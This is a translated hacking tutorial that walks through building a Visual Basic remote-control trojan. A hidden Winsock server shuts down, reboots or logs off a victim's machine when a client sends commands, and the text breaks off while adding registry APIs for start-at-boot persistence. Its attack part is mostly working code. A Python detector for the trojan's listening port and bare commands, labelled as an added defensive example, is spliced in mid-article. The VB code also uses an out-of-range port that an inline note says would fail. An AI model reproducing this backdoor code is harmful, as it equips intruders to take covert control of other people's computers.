Website Intrusion Techniques: A Trojan Attack Implemented in VB

Published: 2008/11/3

A Trojan Attack Implemented in VB
First, create a new project named Server, add a form whose Name is Server, and place a Winsock control on the form with its Name set to sckServer, leaving the protocol at the default TCP/IP.
Next, back in the Server form module, add the following code:
Private Sub form_Load()
  With Me
   .sckServer.LocalPort = 88917 ' Local port (heh, my birthday!)
                                ' Note: valid TCP ports run from 0 to 65535, so this value is out of range and Listen will fail until it is lowered.
   .sckServer.Listen ' Start listening
  End With
End Sub
' Accept the client's connection request.
Private Sub sckServer_ConnectionRequest(ByVal requestID As Long)
  With Me
   If .sckServer.State <> sckClosed Then .sckServer.Close
   .sckServer.Accept requestID
  End With
End Sub
Now let's build the client program: create a new project named Client, name its form Client, and add a Winsock control named sckClient with the TCP/IP protocol. Also add a button named cmdConnect. In the form module add this code:
Private Sub form_Load()
  With Me
   .sckClient.RemoteHost = "127.0.0.1" ' Remote IP; this example uses the local machine.
   .sckClient.RemotePort = 88917 ' Remote port, the same value set in Server (see the range note there).
  End With
End Sub
Private Sub cmdConnect_Click()
  Me.sckClient.Connect
End Sub
At this point, clicking the Connect button lets our two projects communicate, but nothing is visible. To check, add the line Debug.Print "Connection successful!" to the sckClient_Connect event in Client.
This is only the first step and it does no real work yet, so let's add some functionality. To keep things simple, this article implements only a few small functions: shutdown, reboot and logoff. OK, let's begin!
In the Server project create a new module named modApi; this module holds a few API functions. Add the following API declarations:
' Win32 API in user32.dll that logs off, shuts down or reboots the session.
Public Declare Function ExitWindowsEx Lib "user32" Alias "ExitWindowsEx" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Public Const EWX_LOGOFF = 0
Public Const EWX_REBOOT = 2
Public Const EWX_SHUTDOWN = 1
' Confines the mouse cursor to a rectangle; RECT below is its parameter type.
Public Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As Long
Public Type RECT
  Left As Long
  Top As Long
  Right As Long
  Bottom As Long
End Type
Note: in socket programming, the key event for communication between the two sockets is DataArrival, which receives data from the remote end.
Next, place three buttons on the Client form in the Client project: cmdExit, cmdLogoff and cmdReboot. They trigger the remote shutdown, logoff and reboot. Add the following code to each:
Private Sub cmdExit_Click()
  Me.sckClient.SendData "Exit"
End Sub
Private Sub cmdLogoff_Click()
  Me.sckClient.SendData "Logoff"
End Sub
Private Sub cmdReboot_Click()
  Me.sckClient.SendData "Reboot"
End Sub
All three simply send a request to the server. Now switch to the Server project and add the DataArrival event of sckServer, which receives the client's requests:
Private Sub sckServer_DataArrival(ByVal bytesTotal As Long)
  Dim strData As String
  With Me
   ' Receive the client's request
   .sckServer.GetData strData
   Select Case strData
    Case "Exit"
     ' Shut down
     Call ExitWindowsEx(EWX_SHUTDOWN, 0)
    Case "Reboot"
     ' Reboot
     Call ExitWindowsEx(EWX_REBOOT, 0)
    Case "Logoff"
     ' Log off
     Call ExitWindowsEx(EWX_LOGOFF, 0)
   End Select
  End With
End Sub
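The Server above leaves two plain artefacts for a defender: a listening TCP socket on a port nobody provisioned, and bare unencrypted command words ("Exit", "Reboot", "Logoff") travelling as whole payloads. The following Python checks for both; it is an added example, not code from the original article, and its netstat rows and payloads are constructed sample data.

```python
import re

# Exact command vocabulary the tutorial's Client sends with SendData.
BACKDOOR_COMMANDS = {b"Exit", b"Reboot", b"Logoff"}

# One row of Windows `netstat -ano` output: Proto, Local Address,
# Foreign Address, State, PID. Only TCP rows in LISTENING state match.
NETSTAT_RE = re.compile(
    r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$", re.IGNORECASE
)


def unexpected_listeners(netstat_lines, allowed_ports):
    """Return (port, pid) for each listening TCP socket not on the allow-list."""
    findings = []
    for line in netstat_lines:
        m = NETSTAT_RE.match(line)
        if not m:
            continue  # header, UDP, or non-LISTENING rows
        port, pid = int(m.group(1)), int(m.group(2))
        if port not in allowed_ports:
            findings.append((port, pid))
    return findings


def suspicious_payloads(payloads):
    """Return payloads that consist solely of one backdoor command.

    The Server does `Select Case strData` on the raw data, so the Client
    must send the bare word with no framing, newline or encryption. The
    match is therefore exact rather than a substring search, which keeps
    the word "Exit" inside ordinary HTTP text out of the result.
    """
    return [p for p in payloads if p in BACKDOOR_COMMANDS]


# Constructed sample data (not captured from a real host).
SAMPLE_NETSTAT = [
    "  Proto  Local Address          Foreign Address        State           PID",
    "  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880",
    "  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4",
    "  TCP    0.0.0.0:8917           0.0.0.0:0              LISTENING       3120",
    "  TCP    192.168.1.5:49700      10.0.0.9:443           ESTABLISHED     2044",
]
SAMPLE_PAYLOADS = [b"GET / HTTP/1.1\r\n", b"Reboot", b"Exit\n", b"Logoff"]

if __name__ == "__main__":
    print(unexpected_listeners(SAMPLE_NETSTAT, {135, 445}))  # [(8917, 3120)]
    print(suspicious_payloads(SAMPLE_PAYLOADS))  # [b'Reboot', b'Logoff']
```

Note that b"Exit\n" is deliberately not flagged: the Server's exact Select Case match would ignore it too, so the detector mirrors the protocol rather than over-matching.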
Good, the functionality now works, but that isn't enough: we want it to run in the background. That's simple: add the line Me.Hide to the form_Load event in Server. Now it's invisible. But everyone knows a trojan starts automatically at boot; why is that, and how is it done? By adding it to the registry's startup group? Right, follow along!
Back in modApi in the Server project, add the following API functions:
' Registry APIs in advapi32.dll. The Alias string must match the exported name exactly (case-sensitive).
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long